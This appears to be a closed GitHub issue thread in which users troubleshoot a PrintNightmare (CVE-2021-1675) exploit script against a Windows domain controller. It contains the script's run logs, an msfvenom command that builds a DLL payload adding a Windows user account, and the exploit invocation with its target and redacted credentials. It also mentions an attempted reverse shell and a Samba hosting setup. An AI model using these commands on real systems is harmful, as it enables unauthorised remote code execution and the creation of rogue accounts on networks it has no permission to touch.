Closed hdbreaker closed 3 years ago
With a local file on the DC it does not fail, but no reverse shell was executed:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
[*] Try 3...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
When hosting using Samba on Linux, did you run # useradd smbuser? If not, you'll probably get that error if using the provided smb.conf.
Okay, I'm able to exploit it but the DLL is not being executed. I created it with:
./msfvenom -p windows/x64/exec CMD="net user XXXX XXXXX /add" -o ~/Desktop/addCube.dll
I manually copied it to the vulnerable server in C:\ and I executed it with:
python3 CVE-2021-1675.py xxxxx:xxxxxxxx@192.168.10.10 'C:\addCube.dll'
Exactly the same is happening with a remote DLL!
No AV on the target. Do you know what could be happening?
I found my way to make it work! Thanks for your support!
Can you share please, since I got the same error?
@hdbreaker can you share how you got it to work?
The exploit fails after a successful connection, bind, and DLL upload, with error ERROR_NO_SUCH_USER: